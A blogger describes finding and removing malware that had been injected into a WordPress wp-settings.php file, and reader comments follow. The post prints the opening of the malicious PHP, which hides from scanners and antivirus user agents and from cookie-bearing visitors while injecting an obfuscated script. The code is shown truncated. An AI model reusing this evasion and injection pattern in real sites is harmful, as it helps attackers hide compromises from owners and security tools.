This blog uses WordPress plus a very few plugins. That’s built on PHP. So, it’s just asking for trouble.
Today one of my many fans, i.e. my wife, noted that my RSS feed wasn’t working. I’m a professional, so I provided the Guild’s standard response: “Works for me.” Actually it wasn’t working for the desktop blog reading software she uses, while it was working for my desktop blog reader. Finally run the RSS validator on it which announces there is a <script> tag in the feed. Eh, what! I don’t see that doing view source in my browser. Hm.
Finally I pull the feed with curl and that version has the problem. Prepended on the RSS feed is a script that while compressed and obfuscated. The obfuscation means it’s got lot of unique tokens in it, i.e. CeHxprJ, lJeVYuCF, UYwXC, and google finds a copy of the script here: http://pastebay.com/82974 but, that link has disappeared, presumably because that paste bot has a setting that will discard postings after 24 hours.
The infection in my blog was in wp-settings.php. A second <php> block had been inserted at the front of the file. That injected the script into every page, not just the RSS feed. Here’s the start of that code. As you can see it isn’t injected into every page; only certain browsers and then only if there aren’t any cookies yet. That explains why I didn’t see it in my browser and I assume how “generous in what they accept” RSS readers explains why which people were getting my posts.
<?php@ob_start();@error_reporting(0);if(!preg_match('/googlebot|bot|yahoo|slurp|msnbot|slurp|spider|malware|virus|checker|baidu|wordpress|verifier|robot|scanner|nutch|antivir|mcafee|zeus|tracker|abuse|blacklist|zeus|norton/i', $_SERVER['HTTP_USER_AGENT']) && strlen($_SERVER['HTTP_USER_AGENT'])>5 && sizeof($_COOKIE)==0) {print "<script>function CeHxprJ(){if (navigator.userAgent.indexOf(\"MSIE\")>0) return document.body.clientWidth*document.body.clientHeight;else return window.outerWidth*window.outerHeight;}if(CeHxprJ()>100000){function anrLazGcj(tLJVMwsZte){ alert('lJeVYuCF'); } etc
I removed it. All the rest of the php files had md5 checksums that match the distribution of wordpress 2.9.1. Of course I am, presumably, still vulnerable to what ever infected the blog to begin with.
Bleck.
Thanks for the removal tip. this also happened on a blog I maintain on Earthlink. have you found any more info about how this could happen?
Tom – Your welcome. I’ve no news about how it happened. Note that I can tell a window in time it happened from when the RSS feed broke for people.
my search on some terms in the malicious script and on wordpress.org turned up only your blog post for info! wonder if its too new?
Tom – Yeah, maybe new. Maybe the compression varies. Maybe most people effected don’t know and those that do don’t go public.
Pingback: Ascription is an Anathema to any Enthusiasm › Blog Hacks, a bit more info.
Pingback: My WordPress Installation Hacked on Netfirms